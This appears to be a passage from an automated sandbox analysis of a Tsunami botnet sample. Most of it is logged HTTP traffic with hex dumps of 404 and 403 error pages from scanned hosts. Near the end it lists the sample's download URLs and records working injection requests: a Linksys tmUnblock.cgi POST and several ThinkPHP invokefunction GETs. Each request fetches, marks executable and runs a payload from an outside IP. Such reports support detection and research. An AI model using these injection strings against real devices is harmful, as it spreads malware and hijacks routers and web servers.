65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 
69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 01 Nov 2021 03:16:29 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 14Content-Type: text/plainData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a Data Ascii: 404 Not Found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Length: 0Date: Mon, 01 Nov 2021 03:26:10 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 767Date: Mon, 01 Nov 2021 03:16:52 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 
64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 31 30 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resou
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 01 Nov 2021 03:16:52 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 01 Nov 2021 05:16:50 GMT | Server: Webs | X-Frame-Options: SAMEORIGIN | X-Content-Type-Options: nosniff | X-XSS-Protection: 1;mode=block | Cache-Control: no-store | Content-Length: 166 | Content-Type: text/html | Connection: keep-alive | Keep-Alive: timeout=60, max=99 | Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | Content-Type: text/html | Content-Length: 139 | Server: nginx | Set-Cookie: 37aba393e8a1b8e4ad90c8741f5093e8=8117026a-7e36-4293-bfc6-9865fd4e8db5.tFVlSNa-Cjr4U8ROA8-w5lW5fRI; Expires=Wed, 01-Dec-2021 03:16:55 GMT; HttpOnly; Path=/ | Date: Mon, 01 Nov 2021 03:16:55 GMT
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Apache-Coyote/1.1 | Content-Type: text/html;charset=utf-8 | Content-Language: en | Content-Length: 1055 | Date: Mon, 01 Nov 2021 03:16:10 GMT
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 01 Nov 2021 03:16:58 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: keep-alive | Vary: Accept-Encoding | Content-Encoding: gzip
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Apache-Coyote/1.1 | Content-Type: text/html;charset=utf-8 | Content-Language: en | Content-Length: 989 | Date: Mon, 01 Nov 2021 03:14:10 GMT
    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Content-Type: text/html; charset=utf-8 | Content-Length: 106 | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.0.15 | Date: Mon, 01 Nov 2021 03:17:02 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 169 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.15</center></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 01 Nov 2021 03:17:03 GMT | Server: Apache | Content-Length: 196 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 12 Oct 2021 19:10:15 GMT | Server: Boa/0.94.14rc21 | Accept-Ranges: bytes | Connection: close | Content-Type: text/html; charset=ISO-8859-1 | Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 01 Nov 2021 03:17:17 GMT | Content-Type: text/html | Content-Length: 162 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: thttpd | Content-Type: text/html; charset=utf-8 | Date: Mon, 01 Nov 2021 03:17:15 GMT | Last-Modified: Mon, 01 Nov 2021 03:17:15 GMT | Accept-Ranges: bytes | Connection: close | Cache-Control: no-cache,no-store | Data Ascii: <html><head><script>if(location.host=="192.168.1.1"){ location.href="http://"+location.host+"/"}else{ }</script></head><body><h1 style="text-align: center; height: 150px"><span>Error 404, Page not found</span></h1><div style="text-align: center;"><a href="/">Home</a></div></body></html><HR></BODY></HTML>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: thttpd | Content-Type: text/html; charset=utf-8 | Date: Mon, 01 Nov 2021 03:17:20 GMT | Last-Modified: Mon, 01 Nov 2021 03:17:20 GMT | Accept-Ranges: bytes | Connection: close | Cache-Control: no-cache,no-store | Data Ascii: <html><head><script>if(location.host=="192.168.1.1"){ location.href="http://"+location.host+"/"}else{ }</script></head><body><h1 style="text-align: center; height: 150px"><span>Error 404, Page not found</span></h1><div style="text-align: center;"><a href="/">Home</a></div></body></html><HR></BODY></HTML>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Apache-Coyote/1.1 | Content-Type: text/html;charset=utf-8 | Content-Length: 1012 | Date: Mon, 01 Nov 2021 03:17:22 GMT
    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: Web server | Date: Mon, 01 Nov 2021 03:17:17 GMT | Content-Type: text/html | Content-Length: 151 | Connection: keep-alive | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-type: text/html | Content-Length: 0 | Connection: close | AuthInfo:
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: application/octet-stream | Content-Length: 120 | Connection: Close | Data Ascii: <html><head><title>404 File Not Found</title></head><body>The requested URL was not found on this server</body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Mon, 01 Nov 2021 03:17:29 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | X-Frame-Options: SAMEORIGIN | Referrer-Policy: same-origin | Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | Expires: Thu, 01 Jan 1970 00:00:01 GMT | Vary: Accept-Encoding | Server: cloudflare | CF-RAY: 6a71f86dff702b4d-FRA | Content-Encoding: gzip
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: WebServer | Date: Mon, 01 Nov 2021 03:17:18 GMT | Content-Type: text/html | Content-Length: 110 | Connection: close | Data Ascii: <title>404 Not Found</title><h1>404 Not Found</h1>The resource requested could not be found on this server.
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: micro_httpd | Cache-Control: no-cache | Date: Wed, 25 Feb 1970 19:20:04 GMT | Content-Type: text/html | Connection: close | Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Apache-Coyote/1.1 | Content-Length: 0 | Date: Mon, 01 Nov 2021 03:17:34 GMT
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 01 Nov 2021 05:25:20 GMT | Server: Webs | X-Frame-Options: SAMEORIGIN | Cache-Control: no-cache | Content-Length: 166 | Content-Type: text/html | Connection: keep-alive | Keep-Alive: timeout=60, max=99 | Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 01 Nov 2021 03:17:39 GMT | Content-Type: text/html | Content-Length: 146 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 01 Nov 2021 00:20:00 GMT | Server: DNVRS-Webs | Cache-Control: no-cache | Content-Length: 166 | Content-Type: text/html | Connection: keep-alive | Keep-Alive: timeout=60, max=99 | Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Mon, 01 Nov 2021 03:17:41 GMT | Content-Type: text/html | Content-Length: 153 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 01 Nov 2021 00:20:02 GMT | Server: DNVRS-Webs | Cache-Control: no-cache | Content-Length: 166 | Content-Type: text/html | Connection: keep-alive | Keep-Alive: timeout=60, max=99 | Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 01 Nov 2021 00:20:05 GMT | Server: DNVRS-Webs | Cache-Control: no-cache | Content-Length: 166 | Content-Type: text/html | Connection: keep-alive | Keep-Alive: timeout=60, max=99 | Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/plain; charset=utf-8 | X-Content-Type-Options: nosniff | Date: Mon, 01 Nov 2021 03:17:43 GMT | Content-Length: 19 | Connection: close | Data Ascii: 404 page not found
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 01 Nov 2021 03:17:48 GMT | Server: Apache | Content-Length: 196 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 01 Nov 2021 00:20:09 GMT | Server: DNVRS-Webs | Cache-Control: no-cache | Content-Length: 166 | Content-Type: text/html | Connection: keep-alive | Keep-Alive: timeout=60, max=99 | Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 05:08:44 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlCache-Control: publicPragma: cacheExpires: Thu, 09 Jan 2003 18:44:20 GMTDate: Thu, 09 Jan 2003 18:14:20 GMTLast-Modified: Thu, 09 Jan 2003 18:14:20 GMTAccept-Ranges: bytesConnection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 66 66 66 66 66 66 22 3e 0a 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 68 32 3e 0a 20 20 3c 70 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <title>404 Not Found</title></head><body bgcolor="ffffff"> <h2>404 Not Found<h2> <p> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 03:18:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Mon, 01 Nov 2021 03:18:21 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Apache-Coyote/1.1X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: 0Set-Cookie: XSRF-TOKEN=2dfd13a9-dc1a-4ec7-8c36-d1de12087d0f; Path=/Content-Type: application/json;charset=UTF-8Transfer-Encoding: chunkedDate: Mon, 01 Nov 2021 03:18:25 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | String found in binary or memory: http://23.94.37.59/bin
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | String found in binary or memory: http://23.94.37.59/bins/Tsunami.mips;
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | String found in binary or memory: http://23.94.37.59/bins/Tsunami.x86
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | String found in binary or memory: http://23.94.37.59/zyxel.sh;
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: Tsunami.x86, 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
    Source: Tsunami.x86 | String found in binary or memory: http://upx.sf.net
    Source: Xorg.0.log.103.dr, Xorg.0.log.59.dr, Xorg.0.log.152.dr | String found in binary or memory: http://wiki.x.org
    Source: Xorg.0.log.103.dr, Xorg.0.log.59.dr, Xorg.0.log.152.dr | String found in binary or memory: http://www.ubuntu.com/support)
    Source: unknown | HTTP traffic detected: POST /tmUnblock.cgi HTTP/1.1 | Host: 127.0.0.1:80 | Connection: keep-alive | Accept-Encoding: gzip, deflate | Accept: / | User-Agent: python-requests/2.20.0 | Content-Length: 227 | Content-Type: application/x-www-form-urlencoded | Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Tsunami.mpsl%3B+wget+http%3A%2F%2F23.94.37.59%2Fbins%2FTsunami.mpsl%3B+chmod+777+Tsunami.mpsl%3B+.%2FTsunami.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
    Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 | Connection: keep-alive | Accept-Encoding: gzip, deflate | Accept: / | User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://23.94.37.59/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
